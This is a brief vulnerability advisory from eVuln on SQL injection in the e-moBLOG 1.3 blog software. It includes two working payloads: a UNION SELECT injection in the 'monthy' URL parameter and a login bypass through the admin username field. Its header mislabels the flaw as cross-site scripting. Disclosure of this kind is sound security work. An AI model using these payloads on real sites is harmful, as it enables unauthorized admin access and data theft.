New eVuln Advisory: e-moBLOG SQL Injection Vulnerability http://evuln.com/vulns/43/summary.html --------------------Summary---------------- Software: e-moBLOG Sowtware's Web Site: http://www.e-motionalis.net/ Versions: 1.3 Critical Level: Moderate Type: Cross-Site Scripting Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) eVuln ID: EV0043 -----------------Description--------------- Vulnerable script: index.php Variable $monthy isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. Vulnerable script: admin/index.php Variable $login isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. Condition: gpc_magic_quotes - off --------------Exploit---------------------- Available at: http://evuln.com/vulns/43/exploit.html 1. SQL Inection Example http://host/emoblog/index.php? monthy=2006017'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10/*#1 2. SQL Inection Example link: http://host/emoblog/admin/index.php username: aaa' union select 'bbb', '[md5-hash of anypass]'/* password: [anypass] --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)